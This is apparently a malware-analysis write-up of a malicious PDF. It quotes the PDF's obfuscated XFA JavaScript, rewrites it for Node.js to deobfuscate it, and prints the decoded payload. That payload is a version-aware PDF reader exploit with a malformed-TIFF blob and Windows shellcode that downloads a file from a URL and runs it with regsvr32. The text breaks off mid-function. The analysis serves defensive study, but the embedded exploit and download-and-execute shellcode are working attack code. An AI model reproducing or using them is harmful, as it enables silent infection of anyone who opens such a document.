Ox\\8Ex\\\&quot;x\\Ox\\OOx\\OO\\00\\38x\\D5xDEx13x\\5Ox\\Cx\\8x\\46x\\9x\\Bx\\O3x\\17\\B8\\COx\\67xB8xC1x\\67x\\8x\\Ox\\64x\\Bx\\8x\\E7x\\B8\\O2\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\OO\\OOx\\OOx1OxFBx\\EEx\\Cx\\Ox\\0Ox\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\OO\\BFx\\O8xO0x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\40x\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\00\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\3Ox\\Bx\\Ox\\1Ox\\8x\\Ox\\BAx\\OO\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\40x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\&quot;00xlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 &lt; hs ) =+ llehx\\\&quot;hs\t\n;\&quot;00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 &lt;  \nne      t_do\&quot; = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\&quot;==Qpa7x \n;sle }   { e       \nne = ffit_d\\\&quot; x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\&quot;lO\n}    \n;    = ffit US\&quot;AAggDAqk\&quot;QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\&quot; ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\&quot;//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n&quot;;
var KgYZ='UnqS';dXeb='tlli';if (dXeb=='BPbFBV') Yvseg='RHcwt';var JiLFEw;
function PJurKUSv(skImfAh,cYzOyPnWt){cYzOyPnWt=cYzOyPnWt.toString();var rWPjuC=&quot;&quot;;var NqEdBYHxb=0;var rOXMsWL=parseInt;for(var i=0;i&lt;skImfAh.length;i++){if((skImfAh.length-i)&gt;=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))){for(var i2=i+rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))+(3-5+1);i2&gt;=i;i2--){rWPjuC+=skImfAh.substring(i2,i2+1);}
i+=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))-1;}
else{rWPjuC+=skImfAh.substring(i,i+1);}
NqEdBYHxb++;if(NqEdBYHxb&gt;cYzOyPnWt.length-1){if(NqEdBYHxb!=0)NqEdBYHxb=0;};}
if('kjELBq'=='pMJTc')MIikf();var yCRIn=28;function RXNq(){var dMFUNM='psgyT';if('lnkl'=='efrtju')flNQ();}
app.ZlPhsSeh=rWPjuC;var vuub;function QemqN(){var BSVkx='lKMeKr';if('ANWSSM'=='csYStq')VkeY();}}
var jgjS=47;gWJfmC='Xdvz';if (gWJfmC=='rxQSZ') vUtQDG='TFUs';UZcchX='luvbm';if (UZcchX=='lwxtv') yBEo();

function nUjlj(){}var SolyOF=45;
var pgJpC=xfa.host.numPages;
var TrrE=pgJpC;
var jQDAf = 380-(24%11)+TrrE;
PJurKUSv(WDpZj, jQDAf );
var VKwDSciC = &quot;kSVIeYsh&quot;
jChLB='cKAKS';if (jChLB=='bNJDYH') IQgOkG();var JkFxZW=84;var otAfk='HHFBDb';
var leEpPOjDG='';
var lMybUHrE='rOfeKlvuaUGOQniDqlshIM';
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];

var kPvi;function cjcXAF(){}
leEpPOjDG = leEpPOjDG.replace(&quot;u&quot;, &quot;&quot;);
FDBpuw = (&quot;rkwUNvPk&quot;)[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';
var eCDTQ;function fyDCU(){var rwxjqk='MQbZRR';PgEBl='gKaPG';if (PgEBl=='xgzqD') YPGO();}
tAKsEWbR='aps3p.'+tAKsEWbR;
tAKsEWbR=tAKsEWbR.replace(&quot;ps3p&quot;, &quot;pp&quot;);
function pnOkXH(){}var QhSRcq=207;LMunyk='MJKv';if (LMunyk=='obONp') nubS();function oHdY(){var jtAav='CHno';uqCo='ZRZIA';if (uqCo=='ivBaPl') LMIRgd();}
var Itdzqqjus='';
var DjQdjGRE='mWvuzaYFRi.JjpeazHuBcsbHyVIlHp';
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];

muCeJ='KcsrI';if (muCeJ=='hIio') URWv();function OOlYW(){}
FDBpuw(Itdzqqjus+'('+tAKsEWbR+');');
var ktPFXS;var RNdp;var pBanA='xeeH';

                </script>
                </event>
    <ui> 
                    <imageEdit/>
                </ui>
            </field>
        </subform>
    </subform>
</template>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" accessibleContent="1" change="1" contentCopy="1" documentAssembly="1" formFieldFilling="1" metadata="1" modifyAnnots="1" print="1" printHighQuality="1"/>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><ASsQulJ><pgGzgu>Fbeivlcysllwk</pgGzgu></ASsQulJ></xfa:data></xfa:datasets>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"><annots/></xfdf>
<form xmlns="http://www.xfa.org/schema/xfa-form/2.8/" />
</xdp:xdp>


Ok so we are dealing with a JavaScript. Lets clean it up, simplify and prepare it for node-js:

malforsec1 = ""; //set string for output

WDpZj = "f\n\n noitcnusabocne_46e(ed\n{ )atad   46b rav  = GFEDCBA\"JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v    \n;\" ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i     ca     0 =      \n,e  ,\"\" = cn  \nmt      a_p;][ = rr\n \n{ od      \n1o       = ahc.atadoCr++i(tAed\n;)         2oc.atad =rahi(tAedoC)++      \n;o  atad = 3hc.tAedoCra+i(  \n \n;)+    stib   o = 61 << 1o || 8 << 23o     \n \n;   ib = 1h  st & 81 >>3x0     \n;f   tib = 2h> s0 & 21 >f3x      \n;h  stib = 3>> 3x0 & 6 \n;f         4h& stib =x0    \n\n;f3   ra_pmt  a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA   elihw } i( .atad < nel\n \n;)htg   t = cne _pmnioj.rra''(   \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav   _pppa = revv.preVreweioisirtSot.n(gna    \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw   pa(el.rev_ptgn\n{)4 < h   ppa     ev_'0' =+ r \n;er\t\n}   rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y  \n(elihw  dobhtgnel.y <   \n{)nel    ydob    =+  \n;ydob}  ter    \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf =  + x\\30=h&\"\"00llehs\t\n; = 0x\\8Ex\\\"x\\0x\\00x\\00\\OO\\38x\\D5xDEx13x\\50x\\Cx\\8x\\46x\\9x\\Bx\\03x\\17\\B8\\C0x\\67xB8xC1x\\67x\\8x\\0x\\64x\\Bx\\8x\\E7x\\B8\\02\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\00\\00x\\00x10xFBx\\EEx\\Cx\\0x\\00x\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\00\\BFx\\08x00x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\4Ox\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\OO\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\30x\\Bx\\0x\\10x\\8x\\0x\\BAx\\00\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\4Ox\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\OOx\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\"OOxlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 < hs ) =+ llehx\\\"hs\t\n;\"00lle6esab = e_4hs(edocnlle   \n\t\n;)fi rev_teg( )({)0009 <  \nne      t_do\" = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\"==Qpa7x \n;sle }   { e       \nne = ffit_d\\\" x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\"lO\n}    \n;    = ffit US\"AAggDAqk\"QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957    =+ ffit k\" ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\"//fit_dne+\n;fzGgp    .ugeulaVwar = \n}\n;ffitnur(\n;)\n";

function PJurKUSv(skImfAh, cYzOyPnWt) {
    cYzOyPnWt = cYzOyPnWt.toString();
    var rWPjuC = "";
    var NqEdBYHxb = 0;
    var rOXMsWL = parseInt;
    for (var i = 0; i < skImfAh.length; i++) {
        if ((skImfAh.length - i) >= rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1))) {
            for (var i2 = i + rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) + (3 - 5 + 1); i2 >= i; i2--) {
                rWPjuC += skImfAh.substring(i2, i2 + 1);
            }
            i += rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) - 1;
        } else {
            rWPjuC += skImfAh.substring(i, i + 1);
        }
        NqEdBYHxb++;
        if (NqEdBYHxb > cYzOyPnWt.length - 1) {
            if (NqEdBYHxb != 0) NqEdBYHxb = 0;
        };
    }
//    app.ZlPhsSeh = rWPjuC; @malforsec app is PDF specific
    malforsec1 = rWPjuC;

}

var pgJpC = 2; //@malforsec Numpages = 2
var TrrE = pgJpC;
var jQDAf = 380 - (24 % 11) + TrrE;

PJurKUSv(WDpZj, jQDAf); //@malforsec call the string manipulation

var VKwDSciC = "kSVIeYsh"

var leEpPOjDG = '';
var lMybUHrE = 'rOfeKlvuaUGOQniDqlshIM'; // @malforsec euval -> replace("u","") -> eval
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];

leEpPOjDG = leEpPOjDG.replace("u", "");
FDBpuw = ("rkwUNvPk")[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';

tAKsEWbR = 'aps3p.' + tAKsEWbR;
tAKsEWbR = tAKsEWbR.replace("ps3p", "pp"); //@malforsec -> app.

var Itdzqqjus = '';
var DjQdjGRE = 'mWvuzaYFRi.JjpeazHuBcsbHyVIlHp'; //@malforsec app.eval
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];

console.log(malforsec1); //@malforsec console.log instead of eval


Nicer output on this run:


function base64_encode(data) {
    var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
        ac = 0,
        enc = "",
        tmp_arr = [];
 
    do {
        o1 = data.charCodeAt(i++);
        o2 = data.charCodeAt(i++);
        o3 = data.charCodeAt(i++);
 
        bits = o1 << 16 | o2 << 8 | o3;
 
        h1 = bits >> 18 & 0x3f;
        h2 = bits >> 12 & 0x3f;
        h3 = bits >> 6 & 0x3f;
        h4 = bits & 0x3f;

        tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
    } while (i < data.length);
 
    enc = tmp_arr.join('');
 
    return enc;
}
function get_ver(){
    var app_ver = app.viewerVersion.toString();
    app_ver = app_ver.replace('.', '');
    while(app_ver.length < 4){
        app_ver += '0';
    }
 return parseInt(app_ver, 10);
}
function grow(body, len){
    while(body.length < len){
        body += body;
    }
    return body.substring(0, len);
}
function run(){
 var url_var = fGRdP + "&h=03\x00";
 shell = "\xE8\x00\x00\x00\x00\x5D\x83\xED\x05\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\xBE\xEF\x00\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\x00\x02\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00\x52\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00\x52\x50\xFF\x95\xD7\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x89\xEA\x81\xC2\x0B\x02\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x05\x89\xEA\x81\xC2\xE3\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x72\x65\x67\x73\x76\x72\x33\x32\x20\x2D\x73\x20\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\xB8\x01\x00\x00\x66\xAD\x03\x85\xB8\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00\x50\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\xE9\x5E\x93\xD1\xE0\x03\x85\xC4\x01\x00\x00\x31\xF6\x96\x66\xAD\xC1\xE0\x02\x03\x85\xBC\x01\x00\x00\x89\xC6\xAD\x03\x85\xB8\x01\x00\x00\xC3\xEB\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\x85\xB8\x01\x00\x00\x56\x57\xE8\x58\xFF\xFF\xFF\x5F\x5E\xAB\x01\xCE\x80\x3E\xBB\x74\x02\xEB\xED\xC3\x55\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C\x4C\x00\x55\x52\x4C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x54\x6F\x46\x69\x6C\x65\x41\x00\x55\x73\x65\x72\x33\x32\x2E\x65\x78\x65\x00";
 shell += url_var;
 while (shell.length < 1044) shell += "\x00";
 shell = base64_encode(shell);
 
    if(get_ver() < 9000){
        end_tiff = "o+uA\x53\x6agggkpuL4BK/////wAAA\x41BAAAAAAAAAAAA\x51AAAA\x41AA\x41BReA\x53iBW\x68\x45oPY4BKo+u\x41\x53j\x41gg\x6bqv\x57IBK\x58Vy\x41SiYAAAAA\x41AAAA\x41AAAA\x41AAABB\x51UF\x42Q\x55F\x42QQU\x58gE\x70qaVm\x4eEE2BSgUX\x67\x45p0JAS\x4e\x4dFOBS\x67UXg\x45p\x42Q\x55F\x42\x65AzzpEtT\x67U\x6f\x43F4B\x4b\x51U\x46BQT\x48\x4aZItx\x4dIt2D\x49t2\x48ItuCItGIIs2Z\x6a\x6cIGHXyi0U8i1QFeAH\x71\x693Ig\x41e4xyU\x47tAe\x69\x4cGCtYB\x49\x4875SD\x64/3XvSY\x74a\x4aAHrZosMS4taHAHrA\x79yL\x69e\x5aqBP82/9WF\x77K119YE4S\x55kqAHXtlj\x48\x4atQP\x7apQ==";
    } else {
